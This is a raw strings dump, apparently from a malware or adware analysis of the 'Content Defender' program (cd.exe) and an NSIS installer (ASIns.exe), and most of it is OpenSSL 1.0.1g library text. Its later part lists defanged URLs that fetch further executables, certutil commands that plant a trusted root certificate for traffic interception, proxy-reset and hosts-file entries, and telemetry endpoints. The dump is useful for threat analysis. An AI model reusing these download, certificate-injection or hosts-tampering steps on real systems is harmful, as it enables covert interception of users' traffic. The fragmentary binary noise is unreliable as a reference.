EVP_PKEY_derive_init

EVP_PKEY_derive

EVP_PKEY_decrypt_old

EVP_PKEY_decrypt_init

EVP_PKEY_decrypt

EVP_PKEY_CTX_dup

EVP_PKEY_CTX_ctrl_str

EVP_PKEY_CTX_ctrl

EVP_PKEY_copy_parameters

EVP_PKEY2PKCS8_broken

EVP_PKCS82PKEY_BROKEN

EVP_PKCS82PKEY

EVP_CIPHER_CTX_set_key_length

ECKEY_PKEY2PKCS8

ECDSA_PKEY2PKCS8

DSA_PKEY2PKCS8

DSAPKEY2PKCS8

D2I_PKEY

CAMELLIA_INIT_KEY

AES_INIT_KEY

AESNI_INIT_KEY

.\crypto\evp\evp_pkey.c

EVP_CIPHER_key_length(cipher)

keylen

ddddddZ

'() ,-./:=?

X509_PUBKEY

public_key

.\crypto\asn1\x_pubkey.c

pubkey

value.single

value.set

cert_info

X509_CERT_PAIR

X509_CERT_AUX

keyid

NETSCAPE_CERT_SEQUENCE

certs

cert

%8sRequested Extensions:

sa0:00

%8sAttributes:

sUnable to load Public Key

sPublic Key Algorithm:

Subject Public Key Info:

Subject:%c

%8sVersion: %s%lu (%s0x%lx)

Certificate Request:

Public key OCSP hash:

%s - d:d:d%.*s %d%s

%s - d:d:d %d%s

Issuer:%c

s%s

%s%lu (%s0x%lx)

%8sVersion: %lu (0x%lx)

Certificate:

%sX

%*sKey Id:

%*sAlias: %s

No Revoked Certificates.

Revoked Certificates:

%8sNext Update:

%8sLast Update:

%8sIssuer: %s

%8sVersion %lu (0x%lx)

Certificate Revocation List (CRL):

%s %s%lu (%s0x%lx)

Signature Algorithm: %s

Challenge String: %s

Unable to load public key

Public Key Algorithm: %s

%s (%s)

Unprocessed type %d

ERROR: selector [%d] invalid

:EXTERNAL TYPE %s

%*s%s:

%*s%s OF %s {

NETSCAPE_PKEY

private_key

NETSCAPE_ENCRYPTED_PKEY

enckey

SGCKEYSALT

Enter Private Key password:

private-key

.\crypto\asn1\n_pkey.c

.\crypto\asn1\x_pkey.c

-----END %s-----

-----BEGIN %s-----

Content-Transfer-Encoding: base64%s%s

name="%s"%s

smime-type=%s;

Content-Type: %smime;

filename="%s"%s

certs-only

%s------%s--%s%s

filename="smime.p7s"%s%s

Content-Transfer-Encoding: base64%s

name="smime.p7s"%s

Content-Type: %ssignature;

%s------%s%s

------%s%s

This is an S/MIME signed message%s%s

"; boundary="----%s"%s%s

protocol="%ssignature";

MIME-Version: 1.0%s

appl [ %d ]

cont [ %d ]

priv [ %d ]

ASN.1 part of OpenSSL 1.0.1g 7 Apr 2014

unsupported type

unsupported public key type

unsupported encryption algorithm

unsupported any defined by type

unknown public key type

unable to decode rsa private key

unable to decode rsa key

streaming not supported

private key header missing

digest and key type not supported

bad password read

X509_PKEY_new

i2d_RSA_PUBKEY

i2d_PublicKey

i2d_PrivateKey

i2d_EC_PUBKEY

i2d_DSA_PUBKEY

d2i_X509_PKEY

d2i_PublicKey

d2i_PrivateKey

d2i_AutoPrivateKey

keylength

keyfunc

PKCS8_PRIV_KEY_INFO

pkey

pkeyalg

EC PRIVATE KEY

DSA PRIVATE KEY

RSA PRIVATE KEY

TRUSTED CERTIFICATE

X509 CERTIFICATE

CERTIFICATE

PEM part of OpenSSL 1.0.1g 7 Apr 2014

phrase is too short, needs to be at least %d chars

Enter PEM pass phrase:

CERTIFICATE REQUEST

NEW CERTIFICATE REQUEST

PRIVATE KEY

ENCRYPTED PRIVATE KEY

ANY PRIVATE KEY

RSA PUBLIC KEY

PUBLIC KEY

unsupported key components

unsupported encryption

read key

public key no rsa

problems getting password

keyblob too short

keyblob header parse error

expecting public key blob

expecting private key blob

error converting private key

PEM_WRITE_PRIVATEKEY

PEM_READ_PRIVATEKEY

PEM_READ_BIO_PRIVATEKEY

PEM_PK8PKEY

PEM_F_PEM_WRITE_PKCS8PRIVATEKEY

DO_PK8PKEY_FP

DO_PK8PKEY

d2i_PKCS8PrivateKey_fp

d2i_PKCS8PrivateKey_bio

CERTIFICATE PAIR

.\crypto\pem\pem_pkey.c

%s PRIVATE KEY

%s PARAMETERS

/usr/local/ssl/certs

/usr/local/ssl/cert.pem

SSL_CERT_DIR

SSL_CERT_FILE

X.509 part of OpenSSL 1.0.1g 7 Apr 2014

OPENSSL_ALLOW_PROXY_CERTS

unknown key type

unable to get certs public key

public key encode error

public key decode error

no cert set for us to verify

loading cert dir

key values mismatch

key type mismatch

cert already in hash table

cant check dh key

X509_verify_cert

X509_STORE_add_cert

X509_REQ_check_private_key

X509_PUBKEY_set

X509_PUBKEY_get

X509_load_cert_file

X509_load_cert_crl_file

X509_get_pubkey_parameters

X509_check_private_key

GET_CERT_BY_SUBJECT

ADD_CERT_DIR

unsupported or invalid name syntax

unsupported or invalid name constraint syntax

unsupported name constraint type

name constraints minimum and maximum not supported

Unsupported extension feature

invalid or inconsistent certificate policy extension

invalid or inconsistent certificate extension

key usage does not include digital signature

key usage does not include CRL signing

unable to get CRL issuer certificate

key usage does not include certificate signing

authority and subject key identifier mismatch

certificate rejected

certificate not trusted

unsupported certificate purpose

proxy certificates not allowed, please set the appropriate flag

invalid non-CA certificate (has CA markings)

invalid CA certificate

certificate revoked

certificate chain too long

unable to verify the first certificate

unable to get local issuer certificate

self signed certificate in certificate chain

self signed certificate

format error in certificate's notAfter field

format error in certificate's notBefore field

certificate has expired

certificate is not yet valid

certificate signature failure

unable to decode issuer public key

unable to decrypt certificate's signature

unable to get certificate CRL

unable to get issuer certificate

Load certs from files in a directory

%s%clx.%s%d

keyCertSign

Certificate Sign

keyAgreement

Key Agreement

keyEncipherment

Key Encipherment

EXTENDED_KEY_USAGE

%*s

%*s%s

unsupported option

unable to get issuer keyid

policy syntax not currently supported

operation not defined

no public key

no proxy cert policy language defined

no issuer certificate

extension setting not supported

V2I_EXTENDED_KEY_USAGE

V2I_AUTHORITY_KEYID

S2I_SKEY_ID

S2I_ASN1_SKEY_ID

R2I_CERTPOL

d.registeredID

d.iPAddress

d.uniformResourceIdentifier

d.ediPartyName

d.directoryName

d.dNSName

d.rfc822Name

d.otherName

IP Address:%d.%d.%d.%d

URI:%s

DNS:%s

email:%s

EdiPartyName:

X400Name:

othername:

.\crypto\x509v3\v3_skey.c

.\crypto\x509v3\v3_akey.c

PKEY_USAGE_PERIOD

certificateHold

Certificate Hold

cessationOfOperation

Cessation Of Operation

keyCompromise

Key Compromise

%*sZone: %s, User:

d.usernotice

d.cpsuri

d.other

CERTIFICATEPOLICIES

%*sExplicit Text: %s

%*sNumber%s:

%*sOrganization: %s

%*sCPS: %s

name.relativename

name.fullname

%*sOnly Attribute Certificates

%*sOnly CA Certificates

%*sOnly User Certificates

%*scrlUrl:

AUTHORITY_KEYID

%d.%d.%d.%d/%d.%d.%d.%d

PROXY_CERT_INFO_EXTENSION

%*sPolicy Text: %s

d.receiptList

d.allOrFirstTier

d.compressedData

d.authenticatedData

d.encryptedData

d.digestedData

d.envelopedData

d.signedData

d.data

d.ori

d.pwri

d.kekri

d.kari

d.ktri

CMS_PasswordRecipientInfo

keyDerivationAlgorithm

keyIdentifier

CMS_KeyAgreeRecipientInfo

recipientEncryptedKeys

CMS_OriginatorIdentifierOrKey

d.originatorKey

CMS_OriginatorPublicKey

CMS_RecipientEncryptedKey

CMS_KeyAgreeRecipientIdentifier

d.rKeyId

CMS_RecipientKeyIdentifier

CMS_OtherKeyAttribute

keyAttr

keyAttrId

CMS_KeyTransRecipientInfo

encryptedKey

keyEncryptionAlgorithm

certificates

d.crl

d.subjectKeyIdentifier

d.issuerAndSerialNumber

CMS_CertificateChoices

d.v2AttrCert

d.v1AttrCert

d.extendedCertificate

d.certificate

CMS_OtherCertificateFormat

otherCert

otherCertFormat

unsupported recpientinfo type

unsupported recipient type

unsupported key encryption algorithm

unsupported kek algorithm

unsupported content type

unsupported compression algorithm

signer certificate not found

private key does not match certificate

no private key

no password

no msgsigdigest

no key or cert

no key

not supported for this key type

not key transport

msgsigdigest wrong length

msgsigdigest verification failure

msgsigdigest error

invalid key encryption parameter

invalid encrypted key length

error setting key

error getting public key

certificate verify error

certificate has no keyid

certificate already present

CMS_SIGNERINFO_VERIFY_CERT

CMS_RecipientInfo_set0_pkey

CMS_RecipientInfo_set0_password

CMS_RecipientInfo_set0_key

CMS_RecipientInfo_ktri_cert_cmp

cms_msgSigDigest_add1

CMS_GET0_CERTIFICATE_CHOICES

CMS_EncryptedData_set1_key

CMS_decrypt_set1_pkey

CMS_decrypt_set1_password

CMS_decrypt_set1_key

CMS_add1_recipient_cert

CMS_add0_recipient_password

CMS_add0_recipient_key

CMS_add0_cert

CONF part of OpenSSL 1.0.1g 7 Apr 2014

CONF_def part of OpenSSL 1.0.1g 7 Apr 2014

[[%s]]

[%s] %s=%s

openssl.cnf

!BN_is_zero(p->zkpx.gr)

hash of key mismatch

hash of hash of key mismatch

TXT_DB part of OpenSSL 1.0.1g 7 Apr 2014

wrong number of fields on line %ld (looking for field %d, got %d, '%s' left)

enc_key

key_enc_algor

d.encrypted

d.digest

d.signed_and_enveloped

d.enveloped

d.sign

unsupported cipher type

unknown operation

unable to find certificate

signing not supported for this key type

operation not supported on this type

no recipient matches key

no recipient matches certificate

encryption not supported for this key type

decrypted key is wrong length

PKCS7_add_certificate

value.bag

value.safes

value.shkeybag

value.keybag

value.sdsicert

value.x509cert

value.other

.\crypto\pkcs12\p12_crt.c

.\crypto\pkcs12\p12_key.c

unsupported pkcs12 mode

key gen error

PKCS8_add_keyusage

PKCS12_PBE_keyivgen

PKCS12_newpass

PKCS12_MAKE_SHKEYBAG

PKCS12_MAKE_KEYBAG

PKCS12_key_gen_uni

PKCS12_key_gen_asc

PKCS12_add_localkeyid

zlib not supported

unimplemented public key method

invalid cmd number

invalid cmd name

failed loading public key

failed loading private key

cmd not executable

ENGINE_UNLOAD_KEY

ENGINE_load_ssl_client_cert

ENGINE_load_public_key

ENGINE_load_private_key

ENGINE_get_pkey_meth

ENGINE_get_pkey_asn1_meth

ENGINE_ctrl_cmd_string

ENGINE_ctrl_cmd

ENGINE_cmd_is_executable

.\crypto\engine\eng_pkey.c

PKEY_ASN1

PKEY_CRYPTO

PKEY

Software engine support

(TEST_ENG_OPENSSL_RC4) test_init_key() called

(TEST_ENG_OPENSSL_PKEY)Loading Private key %s

Dynamic engine loading support

crlUrl

certStatus

certId

OCSP_CERTSTATUS

value.unknown

value.revoked

value.good

value.byKey

value.byName

reqCert

OCSP_CERTID

issuerKeyHash

Content-Length: %d

POST %s HTTP/1.0

%*sIssuer Key Hash:

%*sCertificate ID:

Revocation Reason: %s (0x%lx)

Cert Status: %s

OCSP Response Status: %s (0x%lx)

unsupported requestorname type

no certificates in chain

error parsing url

PARSE_HTTP_LINE1

OCSP_parse_url

OCSP_cert_id_new

Verifying - %s

subkey

KRB5_ENCKEY

keyvalue

msgtype

xxxxxxxx

3unsupported version

unsupported md algorithm

invalid signer certificate purpose

ess signing certificate error

ess add signing cert error

TS_VERIFY_CERT

TS_TST_INFO_set_msg_imprint

TS_RESP_CTX_set_signer_cert

TS_RESP_CTX_set_certs

TS_REQ_set_msg_imprint

TS_MSG_IMPRINT_set_algo

TS_CHECK_SIGNING_CERTS

ESS_SIGNING_CERT_NEW_INIT

ESS_CERT_ID_NEW_INIT

ESS_ADD_SIGNING_CERT

Certificate required: %s

Version: %d

the requested extension is not supported by the TSA

the requested TSA policy is not supported by the TSA

transaction not permitted or supported

unrecognized or unsupported algorithm identifier

Ordering: %s

Message digest algorithm is not supported.

Requested policy is not supported.

dddddd

Unsupported extension.

Hash Algorithm: %s

unable to load certificate: %s

unable to load certificates: %s

unable to load private key: %s

variable lookup failed for %s::%s

invalid variable value for %s::%s

signer_cert

signer_key

ess_cert_id_chain

ESS_SIGNING_CERT

cert_ids

ESS_CERT_ID

cert_req

msg_imprint

TS_MSG_IMPRINT

hashed_msg

IBM 4758 CCA hardware engine support

IBM_4758_LOAD_PUBKEY

IBM_4758_LOAD_PRIVKEY

IBM 4758 CCA RSA key handle

AEP_ModExpCrt

Aep hardware engine support

mod exp crt failed

missing key components

AEP_MOD_EXP_CRT

ASI_RSAPrivateKeyOpFn

Atalla hardware engine support

swAttachKeyParam

CryptoSwift hardware engine support

bad key size

CSWIFT_MOD_EXP_CRT

HWCryptoHook_ModExpCRT

HWCryptoHook_RSAUnloadKey

HWCryptoHook_RSAGetPublicKey

HWCryptoHook_RSALoadKey

CHIL hardware engine support

private key algorithms disabled

HWCRHK_LOAD_PUBKEY

HWCRHK_LOAD_PRIVKEY

HWCRHK_GET_PASS

pass phrase

Insert card "%s"

Current card: "%s"

nFast HWCryptoHook RSA key handle

Nuron hardware engine support

SureWareHook_Load_Dsa_Pubkey

SureWareHook_Load_Rsa_Pubkey

SureWareHook_Info_Pubkey

SureWareHook_Load_Privkey

SureWare hardware engine support

SUREWAREHK_LOAD_PUBKEY

SUREWAREHK_LOAD_PRIVKEY

ENGINE_load_privkey

ENGINE_load_pubkey

SureWareHook DSA key handle

SureWareHook RSA key handle

ubsec_max_key_len_ioctl

rsa_mod_exp_crt_ioctl

UBSEC hardware engine support

UBSEC_RSA_MOD_EXP_CRT

UBSEC_MOD_EXP_CRT

UBSEC_DH_GENERATE_KEY

UBSEC_DH_COMPUTE_KEY

/dev/ubskey

VIA PadLock (%s, %s)

Certificate store flags: 1 = system store

certificate store name, default "MY"

Set key lookup method (1=substring, 2=friendlyname, 3=container name)

Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)

Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE

key_type

Lookup and output certificates

lookup_cert

List all certificates in store

list_certs

unsupported public key algorithm

unsupported padding

unsupported algorithm nid

pubkey export length error

pubkey export error

invalid rsa public key blob magic number

invalid public key blob

invalid dsa public key blob magic number

getuserkey error

function not supported

error getting key provider info

error adding cert

cant get key

CLIENT_CERT_SELECT

CERT_SELECT_DIALOG

CAPI_LOAD_PRIVKEY

CAPI_GET_PKEY

CAPI_GET_KEY

CAPI_CERT_GET_FNAME

capi_get_provname, returned name=%s, type=%d

capi_get_provname, index=%d

%d. %s, type %d

Container Name: %s, Key Type %d

Provider Name: %s, Provider Type %d

Private Key Info:

No Private Key

%d. %s

Container name %s, len=%d, index=%d, flags=%d

Got max container len %d

Listing containers CSP=%s, type = %d

capi_cert_get_fname

Friendly Name "%s"

Opening certificate store %s

capi_get_key, contname=%s, provname=%s, type=%d

capi_ctx_set_provname, name=%s, type=%d

aiKeyAlg=0x

Certificate %d

Listing certs for store %s

Can't Parse Certificate %d

Setting key type to %d

Setting debug file to %s

Setting debug level to %d

Setting flags to %d

Setting store name to %s

unsupported parameter set

unsupported cipher ctl command

public key undefined

no private part of non ephemeral keypair

no peer key

mac key not set

key parameters missing

key is not initialized

key is not initalized

invalid mac key length

incompatible peer key

error parsing key transport info

error packing key transport info

error computing shared key

cannot pack ephemeral key

bad pkey parameters format

bad key parameters format

PKEY_GOST_MAC_KEYGEN

PKEY_GOST_MAC_CTRL_STR

PKEY_GOST_MAC_CTRL

PKEY_GOST_CTRL94_STR

PKEY_GOST_CTRL01_STR

PKEY_GOST_CTRL

PKEY_GOST94_PARAMGEN

PKEY_GOST94CP_KEYGEN

PKEY_GOST94CP_ENCRYPT

PKEY_GOST94CP_DECRYPT

PKEY_GOST2001_DERIVE

PKEY_GOST01_PARAMGEN

PKEY_GOST01CP_KEYGEN

PKEY_GOST01CP_ENCRYPT

PKEY_GOST01CP_DECRYPT

GOST2001_KEYGEN

.\engines\ccgost\gost2001_keyx.c

gkt->key_info->imit->length==4

gkt->key_info->encrypted_key->length==32

gkt->key_agreement_info->eph_iv->length==8

.\engines\ccgost\gost94_keyx.c

Parameter set: %s

Public key:

Private key:

Public key:

GOST_CLIENT_KEY_EXCHANGE_PARAMS

GOST_KEY_PARAMS

key_params

GOST_KEY_AGREEMENT_INFO

ephem_key

GOST_KEY_INFO

encrypted_key

GOST_KEY_TRANSPORT

key_agreement_info

key_info

ENGINE_set_cmd_defns failed

ENGINE_set_pkey_asn1_meths failed

ENGINE_set_pkey_meths failed

c:\toolchain\src\openssl-1.0.1g\openssl-1.0.1g\out32dll\libeay32.pdb

l}C.we

Operation not permitted

Inappropriate I/O control opera

Broken pipe

CryptDestroyKey

ReportEventA

CryptExportKey

CryptGetUserKey

CertFreeCertificateContext

CertGetCertificateContextProperty

CertOpenStore

CertFindCertificateInStore

CertEnumCertificatesInStore

CertCloseStore

CertDuplicateCertificateContext

_malloc_crt

_amsg_exit

_crt_debugger_hook

GetProcessWindowStation

484484484445

.text

`.rdata

@.data

.rsrc

@.reloc

cd.exe_532:

.text

`.rdata

@.data

.rsrc

@.reloc

w%s(

}.hD]F

?%u4W

Certificate name reading failed

Certificate %s, Is our: %s

Certificate deleted

Certificate deletion failed

Store %s opening %s

Check folder for certificate:

cert8.db

Can't open category key

For category %s enable %s detected

----------------- Domains in category %s-----------------

Category %s enabled: %s

FAdvapi32.dll

RegOpenKeyTransactedA

RegCreateKeyTransactedA

RegDeleteKeyTransactedA

FRegDeleteKeyExA

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}

HTTP/1.1 404 Not OK

Web Content Blocked by Content Defender

HTTP/1.1 204 No Content

Content type for endpoint %u is %s

\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d

\Content Defender\cert

2.5.4.3

Certificate Name is

/version/%uu

cert

Invalid JSON array: %c%c%c%c

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",

Content-type:application/x-www-form-urlencoded; charset=utf8

Checking for process id: %u

Process with id %u recognized as %s

%s %u.%u

opera

firefox

https

HTTP/1.1

Code detected as error: %s

ConDefSetup.exe

url: %s code: %s

{"os":"Windows %u.%u",

"%s",

Content-type:application/x-www-form-urlencoded

Mscoree.dll

successurl

hXXp://contentdefender-cis1.org/data/get/

hXXp://contentdefender-cis1.org/error/index/

hXXp://contentdefender-cis1.org

contentdefender-cis1.org

condef.sys

hXXp://contentdefender-cis1.org/version/checknew/

hXXp://contentdefender-cis2.org

hXXp://contentdefender-cis3.org

hXXp://contentdefender-cis4.org

hXXp://contentdefender-cis5.org

%s open failed, code %u

Domain filtering: %s Words filtering: %s

%u badwords detected

Opening of words key failed

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

\\.\CtrlSM

system32\drivers\%s.sys

SYSTEM\CurrentControlSet\Services\%s

Tcpip

SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

Wtsapi32.dll

SSL\SSLDataProvider.cpp

critical,keyCertSign,cRLSign

%s-%s#ss

%s-%s-%s#child

1.3.6.1.5.5.7.3.1

1.3.6.1.4.1.311.10.3.3

2.16.840.1.113730.4.1

127.0.0.1

HTTP/1.

http/1.

PORT

504 Unsupported transfer mode

504 Unsupported command

PORT

%s.%s.%s.%s:%d

%s:%s

[%s]:%s

File-Count: %d

Total-Bytes: %d

File-Name: %s

{0946134E-4C7F-11D1-8222-444553540000}

C:\prg\ContentDefender\Release\cd.pdb

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCloseKey

RegOpenKeyExA

ReportEventA

RegCreateKeyExA

RegDeleteKeyA

RegEnumKeyExA

RegQueryInfoKeyA

RegQueryInfoKeyW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

InternetCanonicalizeUrlA

InternetOpenUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

WININET.dll

PSAPI.DLL

VERSION.dll

CertOpenStore

CertCloseStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertFreeCertificateContext

CertDeleteCertificateFromStore

CertEnumSystemStore

CertGetNameStringA

CertCreateContext

CRYPT32.dll

WS2_32.dll

SSLEAY32.dll

LIBEAY32.dll

GetCPInfo

CertAddEncodedCertificateToStore

CertGetCertificateChain

CertVerifyCertificateChainPolicy

CertFreeCertificateChain

CertOpenSystemStoreA

CertFindCertificateInStore

CertAddCertificateContextToStore

PFXExportCertStoreEx

zcÃ

.?AV?$CAtlExeModuleT@VCContentDefenderModule@@@ATL@@

.?AVHttpFilter@@

.?AVCUrlChecker@@

.?AVHTTPFilter@ProtocolFilters@@

.?AVSMTPFilter@ProtocolFilters@@

.?AVFTPFilter@ProtocolFilters@@

.?AVFTPDataFilter@ProtocolFilters@@

200075929

%Program Files%\Content Defender\cd.exe

ForceRemove {9B7395C3-28B5-445E-AA7D-539B63514CAB} = s 'DefenderControl Class'

val ServerExecutable = s '%MODULE_RAW%'

TypeLib = s '{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}'

&iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?>

stdole2.tlbWWW

Created by MIDL version 7.00.0555 at Fri Dec 11 20:39:45 2015

9%9/999]9

4 5*595}5

5!5%5)5-5

0!0-030A0M0S0a0g0q0}0

8 8(808

sOLEAUT32.DLL

C{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}

combase.dll

mscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

\*.cer

\cert.db

\x.db

\xtls.db

\xv.db

nss\certutil -A -t "TCu" -i "

opcacrt6.dat

ca-certs

%Program Files%\Content Defender\cert

1.18.0.1

ContentDefender.exe

ASIns.exe_388:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

tware\Microsoft\Windows\CurrentVersion\Internet Settings

EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1

adm\LOCALS~1\Temp\nsk4.tmp\inetc.dll

KERNEL32.DLL

MD5DLL.dll

System.dll

callback%d

`.data

@.reloc

SIZE %s

REST %d

FtpGetFileSize

Proxy-authorization: basic %s

Authorization: basic %s

Content-Type: application/x-www-form-urlencoded

Content-Length: %d

FtpCommandA

%s:%s

%u bytes

%u kB

%u MB

%s - %s

%d:d:d

/password

Filename: %s

NSIS_Inetc (Mozilla)

(Err=%d)

Uploading %s

D$%SP

t.UWh

USER32.DLL

COMCTL32.DLL

HttpQueryInfoA

FtpCreateDirectoryA

FtpOpenFileA

HttpEndRequestA

HttpAddRequestHeadersA

HttpSendRequestA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestExA

WININET.DLL

INetC.dll

Open URL Error

URL Parts Error

FtpCreateDir failed (550)

Error FTP path (550)

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

B`.rdl

.qWOG

`7J.Lv

Y'Ã

x#i.Hu

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsv7.tmp

nsv7.tmp

~1\Temp\nsk4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsqC.tmp

hXXp://counter99.com/Generic/pixl.php

/count.php

-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe" /p=AS /start /ch=IMR1

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9

ASIns.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsk4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\F2D6D111-7DB7-43BB-B86B-087C5EDE56A9\ASIns.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp

hXXp://livestatscounter.com/SysInfo/reportstatus.php?uid=

hXXp://livestatscounter.com/SysInfo/count_vn.php?ch=test

hXXp://livestatscounter.com/SysInfo/count_vc.php?ch=test

hXXp://livestatscounter.com/SysInfo/glob.php?ch=test&sof=4

hXXp://dml07j8fsmdyl.cloudfront.net/VOsrv.exe

hXXp://d3b98uxelh2q3f.cloudfront.net/runasu.exe

hXXp://d1mdi78qyff344.cloudfront.net/JOSrv.exe

hXXp://VVV.livestatscounter.com/SysInfo/hpstats.php

hXXp://livestatscounter.com/vuupc/stats.php

hXXp://VVV.vuupc.com/download_exe.php?sid=

hXXp://VVV.download-servers.com/vuupc/dl.php?r=vu_vo2_

hXXp://VVV.anyprotect.com/dl.php?pr=sc&r=vu_vo2_i_

hXXp://d1mdi78qyff344.cloudfront.net/WinCheckSetup.exe

hXXp://d1mdi78qyff344.cloudfront.net/ConvertAdSetup.exe

hXXp://VVV.download-servers.com/SysInfo/igsSetupSingle.exe

hXXp://d1mdi78qyff344.cloudfront.net/SFSetup.exe

hXXp://livestatscounter.com/vuupc/dl.php?r=vu_vo2_

hXXp://livestatscounter.com/vuupc/dljo.php?r=vu_vo2_

hXXp://livestatscounter.com/countstats/count.php

hXXp://livestatscounter.com/vuupc/dls.php?r=vu_vo2_

hXXp://d1mdi78qyff344.cloudfront.net/IGSrv.exe

hXXp://livestatscounter.com/SysInfo/affiliate_stats.php

hXXp://d1mdi78qyff344.cloudfront.net/CASrv.exe

hXXp://d1mdi78qyff344.cloudfront.net/SU_Srv.exe

hXXp://d1mdi78qyff344.cloudfront.net/Update_Notifier.exe

hXXp://config.anysend.com/dlbase.path

hXXp://d1mdi78qyff344.cloudfront.net/AWSrv.exe

hXXp://mobilitydata5.com/vuupc/dlswe.php?r=WE_ASWD

hXXp://livestatscounter.com/vuupc/dle.php?r=vu_vo2_

hXXp://d16hr9n7t75k58.cloudfront.net/Note-UP_Setup.exe

hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

netsh winhttp reset proxy

Software\Microsoft\Windows\CurrentVersion\Internet Settings

%WinDir%\System32\drivers\etc\hosts

127.0.0.1 VVV.czzsyzgm.com

Nullsoft Install System v2.46

VVV.fdos.org

0.5.0-0

md5dll.dll

1.0.5.2

inetc.dll